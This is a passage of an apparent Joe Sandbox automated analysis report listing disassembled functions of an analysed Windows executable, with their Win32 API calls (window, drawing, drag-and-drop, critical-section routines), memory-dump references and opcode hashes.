                                                                                    • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                    • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologInterlocked$AttributesFileIconIncrement$DecrementErrorExtractLastLoad
                                                                                  • String ID:
                                                                                  • API String ID: 3135826775-0
                                                                                  • Opcode ID: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                  • Instruction ID: d271e0370d57781416bfa7f4525115f2f2ec44ec13527acb039fee82c2046f9e
                                                                                  • Opcode Fuzzy Hash: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                  • Instruction Fuzzy Hash: 4F31B5B5900604EFCB04EBA5C985EEEB7B8EF14314F10452EF115E3292DB78AA45CB25
                                                                                  Function 004A0600 Relevance: 6.1, APIs: 4, Instructions: 93stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLeadNextlstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3156859252-0
                                                                                  • Opcode ID: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                  • Instruction ID: 0e3a410be327782064ec7343a9c9ba60b0fc100549801cd034d74be241764fb9
                                                                                  • Opcode Fuzzy Hash: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                  • Instruction Fuzzy Hash: C631D7352093C68ADB215F259C807ABBFA4AFF3358F1804AFD8C547352D76A4859C72B
                                                                                  Function 004204F4 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004204F9
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 0042051F
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 00451A7B: __EH_prolog.LIBCMT ref: 00451A80
                                                                                    • Part of subcall function 00451A7B: SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00451AB9
                                                                                  • IsWindow.USER32(?), ref: 00420591
                                                                                  • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004205B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$IncrementInterlockedInvalidateMessageRectSendWindow__ftol
                                                                                  • String ID:
                                                                                  • API String ID: 1247432796-0
                                                                                  • Opcode ID: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                  • Instruction ID: 7cdaacfbf1fe49471af1143fd13cbce80a140e36cf0db1da9221879e06584097
                                                                                  • Opcode Fuzzy Hash: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                  • Instruction Fuzzy Hash: 25210471A00214BBCB10EF65CC46FEE77B8EF51754F00011EF801AB2D2DB78AA408BA9
                                                                                  Function 0046CE09 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 0046CE24
                                                                                  • GetClientRect.USER32(?,?), ref: 0046CE3A
                                                                                    • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                  • GetWindowRect.USER32(?,?), ref: 0046CE56
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                  • GetWindowRect.USER32(?,?), ref: 0046CE6A
                                                                                    • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientRect$Screen$ItemMove
                                                                                  • String ID:
                                                                                  • API String ID: 198861566-0
                                                                                  • Opcode ID: 591762bbeb132e1b811eeca561ca943bc44d6c9682266d65a42bcc9986a6ee9a
                                                                                  • Instruction ID: ba6892a318242ff87064be00775bc1915aac5d8e96b5efd900646ca90a6fc9ac
                                                                                  • Opcode Fuzzy Hash: 591762bbeb132e1b811eeca561ca943bc44d6c9682266d65a42bcc9986a6ee9a
                                                                                  • Instruction Fuzzy Hash: 64311E76A00218AFDF18DFB9C955EFEBBB5FF48300F00451DE516A7294DA75AA00CB54
                                                                                  Function 004D11BE Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004D11C3
                                                                                  • GetDlgCtrlID.USER32(?), ref: 004D1207
                                                                                  • lstrcpyn.KERNEL32(?,?,00000050), ref: 004D124C
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 004D126D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CtrlH_prologWindowlstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 2888839504-0
                                                                                  • Opcode ID: 67e5ffd5a930cc6019c5eb7d34b5b4fe0b5525e559414e0eb9b7861bf8a956cc
                                                                                  • Instruction ID: 8587ed83f115aeede87fd028b4f4000d465757bfac9849b8b968199afec38ebc
                                                                                  • Opcode Fuzzy Hash: 67e5ffd5a930cc6019c5eb7d34b5b4fe0b5525e559414e0eb9b7861bf8a956cc
                                                                                  • Instruction Fuzzy Hash: F421C131A00245ABDB24DFA5CC95BABB7E8EF14350F00496FF962E62A0D3759944CB18
                                                                                  Function 00408304 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408309
                                                                                  • FrameRect.USER32(?,?,?), ref: 00408349
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00408356
                                                                                  • FillRect.USER32(?,?,?), ref: 004083AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$FillFrameH_prologInflate
                                                                                  • String ID:
                                                                                  • API String ID: 3463447664-0
                                                                                  • Opcode ID: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                  • Instruction ID: 006d8efee22706b5c6f664660fe7ec29989481165e9f17d750b5c126db11eac0
                                                                                  • Opcode Fuzzy Hash: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                  • Instruction Fuzzy Hash: 61215176800609DFCF10DFA5C9819EEB7B4FB54714F14863FE9A2A3690CB399A04CB55
                                                                                  Function 00424DA2 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424DC6
                                                                                  • __ftol.LIBCMT ref: 00424DD5
                                                                                  • __ftol.LIBCMT ref: 00424DE7
                                                                                    • Part of subcall function 00424F3C: IsWindow.USER32(00000000), ref: 00424F51
                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 00424E2C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftol$H_prologMessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 741011113-0
                                                                                  • Opcode ID: fa4a31fba64813293524b97818a0108495b30c6b4d0b15009067079253c458cf
                                                                                  • Instruction ID: 9ab0a7a076d0958008c4f3d3061b5cc12d4047bc48d7db5961e0b0f69540ac8f
                                                                                  • Opcode Fuzzy Hash: fa4a31fba64813293524b97818a0108495b30c6b4d0b15009067079253c458cf
                                                                                  • Instruction Fuzzy Hash: CF110836604220BAE705A7A7DC42FDF369CDF85715F10001FFA409A182EBADEA4143B8
                                                                                  Function 004D4786 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 004D47E3
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 004D47F3
                                                                                  • LocalFree.KERNEL32(?), ref: 004D47FC
                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 004D4812
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                  • String ID:
                                                                                  • API String ID: 2949335588-0
                                                                                  • Opcode ID: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                  • Instruction ID: 8cf4eee74af497b272b1893a1d16c683aa14186811526e24e1cb218f27e42cd6
                                                                                  • Opcode Fuzzy Hash: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                  • Instruction Fuzzy Hash: ED215635200200EFD7249F88D895BAA77E4FF86755F10806FE9428B3A2C7B9E841CB58
                                                                                  Function 0048079D Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 004807B6
                                                                                  • WindowFromPoint.USER32(?,?), ref: 004807C2
                                                                                  • GetActiveWindow.USER32 ref: 004807E5
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00480817
                                                                                    • Part of subcall function 00407729: InvalidateRect.USER32(?,00000000,00000001,004077EE,00000000), ref: 0040773E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRectWindow$ActiveClientFromPointScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2221759807-0
                                                                                  • Opcode ID: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
                                                                                  • Instruction ID: a089107a9771c350ead831e8e00b5bb5a12bcc199e39954db30e65ab6dd00094
                                                                                  • Opcode Fuzzy Hash: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
                                                                                  • Instruction Fuzzy Hash: 3E118171810344DFCF60FF64D848B9E77B8AF40349F01842FE40296251D7B8AA88CF95
                                                                                  Function 004C8042 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 004C804D
                                                                                  • GetTopWindow.USER32(00000000), ref: 004C8060
                                                                                  • GetTopWindow.USER32(?), ref: 004C8090
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C80AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item
                                                                                  • String ID:
                                                                                  • API String ID: 369458955-0
                                                                                  • Opcode ID: 911d68ac35b51bcd9fda17f2eb98162e000ec35ec917ecacf3376d2b65c4f087
                                                                                  • Instruction ID: f3b330c95797fb7859001996be17dec115cd8be1099a5e39e9e4387b7f005872
                                                                                  • Opcode Fuzzy Hash: 911d68ac35b51bcd9fda17f2eb98162e000ec35ec917ecacf3376d2b65c4f087
                                                                                  • Instruction Fuzzy Hash: DA018F3A10152AB7CBB22F639C04FAF3A589F90790F07802FFD1095211DF39C9159AAA
                                                                                  Function 004C80BB Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTopWindow.USER32(?), ref: 004C80C9
                                                                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004C80FF
                                                                                  • GetTopWindow.USER32(00000000), ref: 004C810C
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C812A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1496643700-0
                                                                                  • Opcode ID: 54d9425182317beee810b26566f9eef6158be4103fbd9b964675d2604aa0a830
                                                                                  • Instruction ID: a77f8250c159371a58dafb510189ea50f6f1655f5f1a4312a9fbfebb934a284f
                                                                                  • Opcode Fuzzy Hash: 54d9425182317beee810b26566f9eef6158be4103fbd9b964675d2604aa0a830
                                                                                  • Instruction Fuzzy Hash: 79012D3A00111ABBCF526F919C08FEF3B65EF05350F05801EF91055161CB3AC922EFA9
                                                                                  Function 004D08E2 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?), ref: 004D08F1
                                                                                  • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 004D090C
                                                                                  • DragQueryFile.SHELL32(?,00000000,?,00000104), ref: 004D092E
                                                                                  • DragFinish.SHELL32(?), ref: 004D0947
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                  • String ID:
                                                                                  • API String ID: 892977027-0
                                                                                  • Opcode ID: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                  • Instruction ID: 6273047b1dacdb82588a39171914f7888b0d2d7cb3e4b550b27c38d8e12f4d70
                                                                                  • Opcode Fuzzy Hash: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                  • Instruction Fuzzy Hash: DB01ADB1900108BFDF00AF64DC84CAE7BBCEF44398F11406AB164971A2CB70AE81CB68
                                                                                  Function 004C8910 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(00000000,0000000C,?), ref: 004C894E
                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 004C895A
                                                                                  • GetSysColor.USER32(00000008), ref: 004C896A
                                                                                  • SetTextColor.GDI32(00000000,?), ref: 004C8974
                                                                                    • Part of subcall function 004CD74E: GetWindowLongA.USER32(00000000,000000F0), ref: 004CD75F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$LongObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2871169696-0
                                                                                  • Opcode ID: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                  • Instruction ID: 93f14773b1531431a45a83eb5b67c9d7019334d302a10841d722513c189ab90c
